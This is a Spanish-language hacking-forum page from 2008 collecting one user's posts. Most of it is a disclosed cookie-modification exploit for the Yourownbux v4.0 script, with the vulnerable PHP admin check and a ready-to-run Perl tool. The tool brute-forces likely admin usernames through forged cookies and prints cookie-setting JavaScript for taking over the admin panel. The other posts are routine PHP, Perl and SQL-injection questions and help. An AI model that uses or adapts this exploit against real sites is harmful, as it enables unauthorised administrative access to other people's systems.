elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 [2] 3
11  Seguridad Informática / Nivel Web / Re: Yourownbux v4.0 => Cookie Modification Exploit en: 13 Septiembre 2008, 18:58 pm
Cita de: ~Shinji~ en 13 Septiembre 2008, 17:51 pm
added :)

ps: are you the same as $pass = "Tec-n0x"; ? ;D

Yes, i Found the bug.

Link Milw0rm
12  Seguridad Informática / Nivel Web / Re: Yourownbux v4.0 => Cookie Modification Exploit en: 13 Septiembre 2008, 17:35 pm
Edito el mensaje:

Puse el fix pero bueno mejor no :P

La solucion es Simple: Validar la cookie UsPass

~Shinji~  : If you still want the fix contact me via MSN.
13  Seguridad Informática / Nivel Web / [°] Yourownbux v4.0 => Cookie Modification Exploit en: 11 Septiembre 2008, 03:51 am
Bueno, esto lo descubri hace un par de dias .. Ahora lo publico.

Vulnerable: /admin/header.php

Código
  1. <?php
  2.  
  3. $user = $_COOKIE["usNick"];
  4.  
  5. 	 $myDb-&gt;connect();
  6.  
  7. 		$sql = "SELECT * FROM yob_users WHERE username='$user'";
  8.  
  9. 		$result = mysql_query($sql);
  10.  
  11. 		$row = mysql_fetch_array($result);
  12.  
  13. 	$myDb-&gt;close(); 
  14.  
  15. 			$is_admin = $row['user_status'];
  16.  
  17.  if($is_admin != "admin"){
  18.  
  19. 	 $display_error = "* You must login as administrator to access this page.";
  20.  
  21. 		 include ('error.php');		 exit();
  22.  
  23.  }
  24.  
  25. ?>

Como pueden ver, Solo se valida la cookie usNick, por lo tanto si tienes el usuario admin correcto, añadiendo las cookies puedes tener acceso al admin panel.

Y un pequeño Exploit para la explotacion es el siguiente:

Código
  1. #!/usr/bin/perl
  2.  
  3. use LWP::UserAgent;
  4. use HTTP::Request;
  5.  
  6. #+-------------------------------------------------------------+-#
  7. #+ Yourownbux v4.0                   --------------------------+--+
  8. #+ Cookie Modification Exploit --------------------------++
  9. #+ Discovered By: Tec-n0x | 04/9/2008 --------------------++
  10. #
  11. # + Gr33tz: OzX, Celciuz, N.O.X && All Friends --++
  12. #+-------------------------------------------------------------+----#
  13.  
  14.  
  15.  
  16. system("clear");
  17.  
  19. # Yourownbux v4.0 Cookie Modification Exploit\n# Discovered By: Tec-n0x\n\n# Tec-n0x [ at ] hotmail [ dot ] com > DropSec.com 
  20. \n# Thanks OzX\n\n";
  21. print "Target [ Example: www.sitedemo.com ] :\n> ";
  22. $target = <STDIN>;
  23. chop($target);
  24.  
  25. if($target =~ m/www\.(.*)\.(.*)/) {
  26.  
  27. $other = $1;
  28. check1($target);
  29.  
  30. } else {
  31. print "\nInvalid Target.";
  32. exit();
  33. }
  34.  
  35. sub explote {
  36.  
  37. @tryusers = ("admina", "administrator", "admins", "admin", "master", "manager", "root", "$other"); 
  38. # Add Posible Users.
  39.  
  40. $check = shift;
  41.  
  42. foreach $user (@tryusers) { 
  43.  
  44. $pass = "Tec-n0x";
  45.  
  46. print "\n\tTrying > $user\n";
  47.  
  48. 	$browser = LWP::UserAgent->new();
  49. 	$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
  50. 	$browser->default_header("Cookie" => "usNick=$user; usPass=$pass");
  51. 	$get = HTTP::Request->new(GET => $check);
  52. 	$resp = $browser->request($get);
  53. 	$content = $resp->content();
  54.  
  55. @code = split("\n",$content);
  56.  
  57. 	foreach $checka (@code) {
  58.  
  59. 			if($checka =~ m/Emails|Served|Workload|Overview/) {
  60.  
  61. system("clear");
  62.  
  63. print "Succesfull EXPLOTED ...!!\n\nValid Username: $user\n\nGo to: $check\n\n And Put this on your browser:";
  64.  
  65. $vd = "javascript\:document\.cookie = \"usNick=$user\; path=\/\"\;";
  66. $vda = "javascript\:document\.cookie = \"usPass=Dropsec\.com\; path=\/\"\;";
  67.  
  69.  
  70. +------------------------------------+
  71. + $vd\n+ $vda
  72. +------------------------------------+
  73. ";
  74.  
  75.  
  76. $yes = 1;
  77.  
  78. exit();
  79.  
  80. }
  81. }
  82. }
  83.  
  84. if($yes != 1) {
  85.  
  86. print "\n\n\nExploit Failed";
  87.  
  88. exit();
  89.  
  90. }
  91.  
  92. }
  93. sub check1 {
  94.  
  95. $target = shift;
  96.  
  97. $check = "http\:\/\/$target\/admin\/index\.php";
  98.  
  99. 	$browser = LWP::UserAgent->new();
  100. 	$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");
  101. 	$get = HTTP::Request->new(GET => $check);
  102. 	$resp = $browser->request($get);
  103. 	$content = $resp->content();
  104.  
  105. @code = split("\n",$content);
  106.  
  107. 	foreach $checka (@code) {
  108.  
  109. 			if($checka =~ m/You must login as administrator to access this page/) {
  110.  
  111. print "Check 1 [ OK ]\n";
  112.  
  113. $success = 1;
  114.  
  115. explote($check);
  116.  
  117. } 
  118.  
  119. }
  120.  
  121. if($sucess != 1) {
  122.  
  123. print "Failed";
  124.  
  125. exit();
  126.  
  127. }
  128.  
  129. }
  130.  

El Post original, Clickeando Aqui.

Saludos
14  Seguridad Informática / Nivel Web / Re: Codigo interesante?? como hariais sql injection?? en: 4 Septiembre 2008, 05:35 am
Cita de: f3ler en  3 Septiembre 2008, 19:36 pm
Buenas tardes.

Como podria hacer SQL injection con este codigo PHP??:
Código:
$lole=$_COOKIE["usNick"];

$tabla = mysql_query("SELECT * FROM tb_users where referer='$lole' ORDER BY id ASC");

Un saludo.

Hola .. te cuento que yo tambien me pase un buen rato tratando de buscar SQL Injection en PTC's [ " Secure " bux / yourownbux / etc ] .. Y eso no funciona ..

Fijate que mas abajo lo que hace es para verificar con mysql_nums_rows o algo parecido ..

Si es donde yo pienso ..

Saludos
15  Seguridad Informática / Nivel Web / Re: CSRF / XSRF - Cross Site Request Forgery en: 28 Agosto 2008, 03:29 am
Cita de: nachosaenz en 27 Agosto 2008, 21:37 pm
me ayudas no me sale la imagen del capcha en el navedador gracias por el aporte

Pusiste como esta en el posT?

Código:
<img src="nombre_del_archivo.php">
16  Programación / PHP / Re: Ayuda para montar ptc en: 10 Agosto 2008, 21:54 pm
Cita de: 856 en 10 Agosto 2008, 08:09 am
hola amigos me  gustaria si me pudieran ayudar para poder montar mi propia ptc por el momento en un servidor gratis, tengo los scripts pero hasta ahi llego :-[ espero sus respuestas

Es sencillo eso ..

El script que tienes trae un archivo con la consulta SQL .. seguro se llama " Database "

Vas a la base de datos de tu hosting .. y ejecutas la consulta ...

Configuras el " config.php " con los datos de tu BD y listo ..

 ;)
17  Programación / PHP / Re: Sistema de consultas en PHP en: 10 Agosto 2008, 02:21 am
Cita de: Cerdo en  9 Agosto 2008, 22:05 pm
La verdad que si, seria de gran ayuda tener el codigo hecho, porque soy muy novato en php y nunca antes habia intentado manejar bases de datos en otra cosa que no fueran archivos de TXT y suelo practica de codigos ya hechos y modificarlos para hacer pruebas y ganar experiencia, hombre no se si pudieran ayudarme a sacar el codigo o señalar una aplicacion pre fabricada con su autoria yo k se  >:(


ayuden a este pobre novato, gracias  :-[

Bueno, yo creo que una cosa es ayudarte con un codigo y otra prepararte el codigo.

http://phpya.com.ar
http://mysqlya.com.ar

Saludos
18  Programación / Scripting / Re: Instalación de Librerías / Modulos en Perl en: 10 Agosto 2008, 02:19 am
Cita de: ^TiFa^ en  8 Agosto 2008, 23:07 pm
En Linux/Unix suele ser un poco mas interactivo. Solo se abre un terminal y nos logeamos a la terminal de perl, y a buscar driver o instalar   :D


bash-3.1# perl -MCPAN -e shell
CPAN: File::HomeDir loaded ok (v0.69)

cpan shell -- CPAN exploration and modules installation (v1.9205)
ReadLine support enabled                                         

cpan[1]>
cpan[2]> m BDB::mysql
No objects of type Module found for argument BDB::mysql

cpan[3]> m DBI
Module id = DBI
    DESCRIPTION  Generic Database Interface (see DBD modules)
    CPAN_USERID  TIMB (Tim Bunce <Tim.Bunce@pobox.com>)
    CPAN_VERSION 1.607
    CPAN_FILE    T/TI/TIMB/DBI-1.607.tar.gz
    DSLIP_STATUS MmcOp (mature,mailing-list,C,object-oriented,Standard-Perl)
    MANPAGE      DBI - Database independent interface for Perl
    INST_FILE    /usr/local/lib/perl5/site_perl/5.10.0/i686-linux/DBI.pm
    INST_VERSION 1.605


Gracias por eso .. no tenia idea de como se hacia ... en un rato cuando vaya al ubuntu lo probare ..

Saludos
19  Programación / PHP / Re: Sistema de consultas en PHP en: 8 Agosto 2008, 14:10 pm
Cita de: Cerdo en  8 Agosto 2008, 01:37 am
logre ver en la red el sistema exacto que pretendo manejar es este


http://www.fipcolombia.com/consultasVer.php

no se si pudieran checar el enlace y el tipo de formulario y datos y como se manejan, para poder darme una idea en codigo de como llevarlo a la practica, gracias.


tomemos en cuenta que cuando las consultas se envian en el form, no se publican inmediatamente, se envian a algun lugar y estoy casi seguro que al responderles se publican.

¿?

Te he dicho arriba exactamente lo que quieres ... No querras que te pongamos el codigo hecho verdad?   :-\
20  Programación / PHP / Re: Sistema de consultas en PHP en: 7 Agosto 2008, 21:08 pm
Es sencillo ...

Pones un formulario pidiendo los datos:

Código:
<form action="2.php" method="POST">
Nombre: <input type="text" name="nombre">
Telefono: <input type="text" name="tel">

Y Luego en el otro archivo .. Recives los datos y los metes en la bd ...

Y Creas una columna llamada " approved " en la BD ...

Entonces, cuando alguien mande ... Le pones por default 0 .. y en el admin ..

Solo tienes que poner que cuando clickees en Aprovar .. con un update .. le ponga 1 al " approved "

y Luego con un bucle While ... muestras todos los registros de la bd ..

Y acuerdate pasar por htmlspecialchars / htmlentities las variables para evitar XSS / SQL Injection.

Saludos
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines